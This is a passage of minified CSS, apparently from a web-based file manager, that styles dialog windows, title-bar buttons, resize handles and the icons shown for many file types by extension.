#ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none 